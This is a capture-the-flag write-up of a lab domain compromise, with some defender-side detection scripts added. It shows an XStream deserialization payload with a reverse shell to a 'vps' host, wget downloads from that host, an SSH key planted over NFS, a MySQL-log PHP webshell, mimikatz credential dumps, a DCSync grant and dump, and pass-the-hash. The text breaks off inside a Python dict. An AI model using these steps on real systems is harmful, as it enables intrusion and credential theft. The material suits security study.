flag1

fscan64 -h 39.98.117.253

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.117.253   is alive
[*] Icmp alive hosts len is: 1
39.98.117.253:80 open
39.98.117.253:21 open
39.98.117.253:22 open
39.98.117.253:8080 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.98.117.253      code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[+] ftp://39.98.117.253:21:anonymous
   [->]1.txt
   [->]pom.xml
[*] WebTitle: http://39.98.117.253:8080 code:200 len:3655   title:公司发货单
已完成 4/4
[*] 扫描结束,耗时: 38.6700939s

FTP anonymous login

1.txt is empty; pom.xml:

<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.2</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>ezjava</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjava</name>
    <description>ezjava</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.16</version>
        </dependency>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>
    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>

XStream CVE-2021-29505 and the CommonsCollections5 (cc5) chain can be used against this.
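As an added defender-side example (not part of the original writeup), a small Python checker that reads a pom.xml like the one above and flags the two dependency versions that make the app exploitable. The minimum-safe-version table is hand-maintained here (an assumption to keep in sync with advisories), and the sample pom is a constructed, cut-down copy of the page's file:

```python
import re
import xml.etree.ElementTree as ET

# Hand-maintained table (assumption: keep it in sync with advisories).
# XStream 1.4.17 fixed CVE-2021-29505; commons-collections 3.2.2 disabled
# deserialization of the functor classes used by the CommonsCollections chains.
MIN_SAFE = {
    ("com.thoughtworks.xstream", "xstream"):
        ("1.4.17", "CVE-2021-29505 (unsafe deserialization)"),
    ("commons-collections", "commons-collections"):
        ("3.2.2", "CommonsCollections gadget chains (e.g. CC5)"),
}


def parse_version(v):
    """'1.4.16' -> (1, 4, 16); qualifiers such as '-SNAPSHOT' are ignored."""
    return tuple(int(x) for x in re.findall(r"\d+", v))


def local_name(tag):
    """Drop the Maven namespace if present; the page's copy has it stripped."""
    return tag.rsplit("}", 1)[-1]


def find_vulnerable(pom_xml):
    """Return [(artifactId, declared, minimum_safe, why)] for risky dependencies."""
    findings = []
    for dep in ET.fromstring(pom_xml).iter():
        if local_name(dep.tag) != "dependency":
            continue
        fields = {local_name(c.tag): (c.text or "").strip() for c in dep}
        key = (fields.get("groupId"), fields.get("artifactId"))
        if key not in MIN_SAFE or "version" not in fields:
            continue  # not tracked, or version managed by the parent BOM
        safe, why = MIN_SAFE[key]
        if parse_version(fields["version"]) < parse_version(safe):
            findings.append((key[1], fields["version"], safe, why))
    return findings


# Constructed, cut-down copy of the pom.xml recovered over FTP
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencies>
    <dependency><groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId></dependency>
    <dependency><groupId>com.thoughtworks.xstream</groupId>
      <artifactId>xstream</artifactId><version>1.4.16</version></dependency>
    <dependency><groupId>commons-collections</groupId>
      <artifactId>commons-collections</artifactId><version>3.2.1</version></dependency>
  </dependencies>
</project>"""

if __name__ == "__main__":
    for artifact, have, need, why in find_vulnerable(SAMPLE_POM):
        print(f"{artifact} {have} < {need}: {why}")
```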

Target port 8080.

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections5 "bash -c {echo,YmFzaCA...0IDA+JjE=}|{base64,-d}|{bash,-i}"
 <java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>vps</string>
                                                <int>6666</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>vps</host>
                                        <port>6666</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

Get a reverse shell and grab the flag.

flag2

ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.13.14  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::216:3eff:fe04:251b  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:04:25:1b  txqueuelen 1000  (Ethernet)
        RX packets 109791  bytes 147614543 (147.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 23683  bytes 3702075 (3.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 834  bytes 78279 (78.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 834  bytes 78279 (78.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
wget http://vps:88/fscan
wget http://vps:88/frpc
wget http://vps:88/frpc.ini
chmod +x fscan
./fscan -h 172.22.13.14/24

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.13.14    is alive
(icmp) Target 172.22.13.6     is alive
(icmp) Target 172.22.13.28    is alive
(icmp) Target 172.22.13.57    is alive
[*] Icmp alive hosts len is: 4
172.22.13.14:80 open
172.22.13.57:80 open
172.22.13.28:80 open
172.22.13.57:22 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.6:88 open
172.22.13.28:3306 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.6:139 open
172.22.13.28:139 open
172.22.13.28:135 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle: http://172.22.13.28       code:200 len:2525   title:欢迎登录OA办公平台
[*] NetInfo:
[*]172.22.13.28
   [->]WIN-HAUWOLAO
   [->]172.22.13.28
[*] WebTitle: http://172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] WebTitle: http://172.22.13.57       code:200 len:4833   title:Welcome to CentOS
[*] WebTitle: http://172.22.13.28:8000  code:200 len:170    title:Nothing Here.
[*] NetInfo:
[*]172.22.13.6
   [->]WIN-DC
   [->]172.22.13.6
[*] NetBios: 172.22.13.6     [+]DC XIAORANG\WIN-DC          
[*] NetBios: 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393 
[+] ftp://172.22.13.14:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] WebTitle: http://172.22.13.14:8080  code:200 len:3655   title:公司发货单
[+] mysql:172.22.13.28:3306:root 123456
已完成 16/16
[*] 扫描结束,耗时: 16.902366459s

Summary:

172.22.13.14  this host (foothold)
172.22.13.57  80, 22, 2049  NFS
172.22.13.28  8000, 3306, 80  WIN-HAUWOLAO
172.22.13.6   WIN-DC (domain controller)

Look at host .57 next; set up a proxy first.

For NFS privilege escalation, see this article:

https://xz.aliyun.com/t/11664#toc-12

apt-get update
apt-get install nfs-common
showmount -e 172.22.13.57
mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock

Plant an RSA SSH key backdoor

ssh-keygen -t rsa -b 4096 -f /tmp/id_rsa        # key pair lands in /tmp
cd /tmp/temp/home/joyce/
mkdir .ssh
cp /tmp/id_rsa.pub /tmp/temp/home/joyce/.ssh/
cat /tmp/id_rsa.pub >> /tmp/temp/home/joyce/.ssh/authorized_keys
ssh -i /tmp/id_rsa joyce@172.22.13.57
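The mount-and-write step above only works because of how the share is exported. As an added defender-side example (not from the writeup), a Python checker for /etc/exports that flags root exports, wildcard clients, no_root_squash and writable combinations; the exports file below is constructed, not the target's real one:

```python
def parse_exports(text):
    """Yield (path, host, options) for every client clause in an exports file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        parts = line.split()
        path, clauses = parts[0], parts[1:] or ["*"]  # no client spec = everyone
        for clause in clauses:
            host, _, opts = clause.partition("(")
            options = {o for o in opts.rstrip(")").split(",") if o}
            yield path, host or "*", options


def risky_exports(text):
    """Return [(path, host, [reasons])] for exports worth fixing."""
    findings = []
    for path, host, opts in parse_exports(text):
        reasons = []
        if path == "/":
            reasons.append("exports the whole root filesystem")
        if host == "*" or host.startswith("*."):
            reasons.append("any client may mount it")
        if "no_root_squash" in opts:
            reasons.append("no_root_squash: a remote root writes files as root")
        if "rw" in opts and ("no_root_squash" in opts or host == "*"):
            reasons.append("writable by an untrusted or root-preserving client")
        if reasons:
            findings.append((path, host, reasons))
    return findings


# Constructed exports file: a root export of the kind the mount above relies on,
# and a scoped read-only export for contrast.
SAMPLE_EXPORTS = """
# constructed sample, not the target's real /etc/exports
/           *(rw,no_root_squash,sync)
/srv/share  172.22.13.0/24(ro,root_squash,sync)
"""

if __name__ == "__main__":
    for path, host, reasons in risky_exports(SAMPLE_EXPORTS):
        print(path, host, "; ".join(reasons))
```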

Connected successfully. We have no permission to read the flag, but there is also a pAss.txt:

xiaorang.lab/zhangwen\QT62f3gBhK1

Try SUID privilege escalation.

find / -user root -perm -4000 -print 2>/dev/null
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/mount.nfs
/usr/bin/sudo
/usr/bin/chage
/usr/bin/at
/usr/bin/mount
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/ftp
/usr/bin/umount
/usr/lib/polkit-1/polkit-agent-helper-1

ftp can be abused (it is SUID root).

On 172.22.13.14 (serve a writable FTP directory):

python3 -m pyftpdlib -p 6666 -u test -P test -w &

On 172.22.13.57 (the SUID root ftp client can read the flag):

ftp 172.22.13.14 6666
test
test
put flag02.txt

Back on 172.22.13.14:

cat /root/flag/flag02.txt

flag3

Now look at host .28.

The fscan run above found a weak MySQL password, so connect directly with Navicat.

root/123456

The database holds nothing of interest, but since we have root, check whether we can write a shell.

It is not enabled (the general query log), but we also discover that phpStudy is installed on the server.

Enable it from the command line:

set global general_log = "ON";

Set the log path to the web root (we know phpStudy is in use, so its default web root is used here) and give the file the matching script extension:

set global general_log_file ='C:/phpstudy_pro/WWW/shell.php';

Write the webshell:

select '<?php eval($_POST[1]);?>';

Got flag3.
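The three statements above leave a clear trace in the general query log itself. As an added defender-side example (not from the writeup), a Python scanner over MySQL general-log lines that flags the log path being redirected under a web root or to a script extension, and script tags inside query text; the log lines are constructed and the web-root list is an assumption:

```python
import re

WEB_ROOTS = ("c:/phpstudy_pro/www", "/var/www")    # assumption: local web roots
SCRIPT_EXT = (".php", ".jsp", ".asp", ".aspx")

# MySQL 5.7+/8.0 general log line: "<time>\t<thread id> <command>\t<argument>"
LINE_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<tid>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")
SET_LOG_RE = re.compile(r"general_log_file\s*=\s*['\"]?(?P<path>[^'\"]+)", re.I)
TAG_RE = re.compile(r"<\?(php|=)|<%", re.I)


def classify(arg):
    """Reason string when a query looks like log-to-webshell abuse, else None."""
    m = SET_LOG_RE.search(arg)
    if m:
        path = m.group("path").strip().replace("\\", "/").lower()
        if path.endswith(SCRIPT_EXT) or path.startswith(WEB_ROOTS):
            return "general_log_file pointed at " + m.group("path").strip()
    if TAG_RE.search(arg):
        return "script tag in query text"
    return None


def scan(lines):
    """Return [(thread_id, reason)] for suspicious Query entries."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        reason = classify(m.group("arg"))
        if reason:
            findings.append((m.group("tid"), reason))
    return findings


# Constructed log lines replaying the three statements from the writeup
SAMPLE_LOG = [
    "2023-10-05T10:27:30.000001Z\t   12 Query\tset global general_log = \"ON\"",
    "2023-10-05T10:27:40.000002Z\t   12 Query\tset global general_log_file ='C:/phpstudy_pro/WWW/shell.php'",
    "2023-10-05T10:28:01.000003Z\t   12 Query\tselect '<?php eval($_POST[1]);?>'",
    "2023-10-05T10:28:05.000004Z\t   13 Query\tselect 1",
]

if __name__ == "__main__":
    for tid, reason in scan(SAMPLE_LOG):
        print(tid, reason)
```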

flag4

Upload mimikatz.

mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" "exit"
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 6535704 (00000000:0063ba18)
Session           : RemoteInteractive from 2
User Name         : zhangwen
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2023/10/5 18:31:22
SID               : S-1-5-21-3269458654-3569381900-10559451-1104
    msv :    
     [00000003] Primary
     * Username : zhangwen
     * Domain   : XIAORANG
     * NTLM     : fa7d776fdfc82d3f43c9d8b7f5312d77
     * SHA1     : 3e568ea10e85b91f95af47b064b713f83682d1ee
     * DPAPI    : 4b3a5a99aa46e26e47ff5fbe2c7e58b4
    tspkg :    
    wdigest :    
     * Username : zhangwen
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : zhangwen
     * Domain   : XIAORANG.LAB
     * Password : (null)
    ssp :    
    credman :    
Authentication Id : 0 ; 6520998 (00000000:006380a6)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 18:31:21
SID               : S-1-5-90-0-2
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : e104c781fe7b3f4a8bcb215097319193
     * SHA1     : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : WIN-HAUWOLAO$
     * Domain   : xiaorang.lab
     * Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72 
    ssp :    
    credman :    
Authentication Id : 0 ; 6516069 (00000000:00636d65)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 18:31:21
SID               : S-1-5-90-0-2
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : e104c781fe7b3f4a8bcb215097319193
     * SHA1     : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : WIN-HAUWOLAO$
     * Domain   : xiaorang.lab
     * Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72 
    ssp :    
    credman :    
Authentication Id : 0 ; 90670 (00000000:0001622e)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2023/10/5 18:10:44
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
    msv :    
     [00000003] Primary
     * Username : chenglei
     * Domain   : XIAORANG
     * NTLM     : 0c00801c30594a1b8eaa889d237c5382
     * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
     * DPAPI    : 89b179dc738db098372c365602b7b0f4
    tspkg :    
    wdigest :    
     * Username : chenglei
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : chenglei
     * Domain   : XIAORANG.LAB
     * Password : Xt61f3LBhg1
    ssp :    
    credman :    
Authentication Id : 0 ; 89589 (00000000:00015df5)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2023/10/5 18:10:44
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
    msv :    
     [00000003] Primary
     * Username : chenglei
     * Domain   : XIAORANG
     * NTLM     : 0c00801c30594a1b8eaa889d237c5382
     * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
     * DPAPI    : 89b179dc738db098372c365602b7b0f4
    tspkg :    
    wdigest :    
     * Username : chenglei
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : chenglei
     * Domain   : XIAORANG.LAB
     * Password : Xt61f3LBhg1
    ssp :    
    credman :    
Authentication Id : 0 ; 52118 (00000000:0000cb96)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:42
SID               : S-1-5-90-0-1
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : b5cd3591a58e1169186bcdbfd4b6322d
     * SHA1     : 226ee6b5e527e5903988f08993a2456e3297ee1f
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : WIN-HAUWOLAO$
     * Domain   : xiaorang.lab
     * Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;`Nfr;;Hf8O'Szfl0Z=w+^,>0jR
    ssp :    
    credman :    
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:42
SID               : S-1-5-20
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : e104c781fe7b3f4a8bcb215097319193
     * SHA1     : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : win-hauwolao$
     * Domain   : XIAORANG.LAB
     * Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72 
    ssp :    
    credman :    
Authentication Id : 0 ; 23506 (00000000:00005bd2)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:42
SID               : 
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : e104c781fe7b3f4a8bcb215097319193
     * SHA1     : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
    tspkg :    
    wdigest :    
    kerberos :    
    ssp :    
    credman :    
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:43
SID               : S-1-5-19
    msv :    
    tspkg :    
    wdigest :    
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :    
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :    
    credman :    
Authentication Id : 0 ; 52075 (00000000:0000cb6b)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:42
SID               : S-1-5-90-0-1
    msv :    
     [00000003] Primary
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * NTLM     : e104c781fe7b3f4a8bcb215097319193
     * SHA1     : 6f30257f6ce8fbe41f1d2d007f097b9aeed20fac
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : WIN-HAUWOLAO$
     * Domain   : xiaorang.lab
     * Password : 99 d5 9b 15 93 9c bd 23 c3 8a 98 ea 9c 4c 32 48 d1 ac fa 56 5b 37 8e ca 90 d4 6d 76 cc fe a6 7d 37 95 84 46 bf 32 36 e1 d0 b9 93 3f 2f df 7d f9 60 cb a4 30 7e 01 27 fe e7 6e 39 87 75 7e d6 38 aa d8 36 8e 5b 41 35 bf 3c 7c fd 48 a2 06 63 dd 90 23 ce 50 05 23 4b 12 ab a3 10 f5 54 59 3b c0 4c 30 5a 5a 0d 89 1f 02 22 af 12 10 91 08 a6 56 f3 71 33 d7 27 99 ab 26 61 c0 d3 b8 cd c0 78 b9 0d f6 6f aa ac d1 d4 f2 23 d6 3f 32 67 96 ce 71 0f 1e 59 9e 15 3d 56 c5 91 af 8f cb d8 4f aa 84 59 97 15 65 11 e8 93 f7 a2 07 ab 8c 7e 34 de 4a f7 d2 db 9c 86 57 1d 77 b0 00 40 31 9c e7 69 33 3a 45 44 3a 29 1a a1 b4 c6 d8 8f f8 c1 b2 b9 a8 db e1 ea 26 b2 56 3b a7 72 6a 06 f2 df 77 3a 12 70 dd d7 fc 5d 36 05 62 3b 9a e2 5e 98 ea 00 72 
    ssp :    
    credman :    
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2023/10/5 18:10:42
SID               : S-1-5-18
    msv :    
    tspkg :    
    wdigest :    
     * Username : WIN-HAUWOLAO$
     * Domain   : XIAORANG
     * Password : (null)
    kerberos :    
     * Username : win-hauwolao$
     * Domain   : XIAORANG.LAB
     * Password : (null)
    ssp :    
    credman :    
mimikatz(commandline) # exit
Bye!

chenglei is in the ACL Admin group.

net user /domain
net user chenglei /domain

So the chenglei account has WriteDACL rights.

Log in to chenglei's remote desktop and use PowerView to grant the chenglei account DCSync rights.

chenglei/Xt61f3LBhg1

PowerView is taken from the Empire 2.5 release (EmpireProject/Empire on GitHub).

Import-Module .\powerview.ps1
Add-DomainObjectAcl -TargetIdentity 'DC=xiaorang,DC=lab' -PrincipalIdentity chenglei -Rights DCSync -Verbose

Next, use mimikatz to dump all domain user hashes:

lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'WIN-DC.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  cb976ec1a1bf8a14a15142c6fecc540e        514
1106    zhangtao        e786c4a4987ced162c496d0519496729        512
1000    WIN-DC$ 3e6e01dca4c30872a929cb85407b4e6c        532480
500     Administrator   6341235defdaed66fb7b682665752c9a        512
1105    chenglei        0c00801c30594a1b8eaa889d237c5382        512
1103    WIN-HAUWOLAO$   e104c781fe7b3f4a8bcb215097319193        4096
1104    zhangwen        fa7d776fdfc82d3f43c9d8b7f5312d77        512

Finally, pass the hash with wmiexec:

proxychains impacket-wmiexec -hashes :6341235defdaed66fb7b682665752c9a xiaorang.lab/Administrator@172.22.13.6
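Both the DACL grant and the replication pull above are visible on the DC. As an added defender-side example (not from the writeup), a Python detector over Security events exported as JSON lines: a 5136 rewriting nTSecurityDescriptor on the domain head, and a 4662 on the domain object with the DS-Replication-Get-Changes GUIDs by anything other than a DC account. The events are constructed, and the DC account list is an assumption taken from the fscan output:

```python
import json

# Control-access rights that allow directory replication (well-known GUIDs).
REPL_RIGHTS = {
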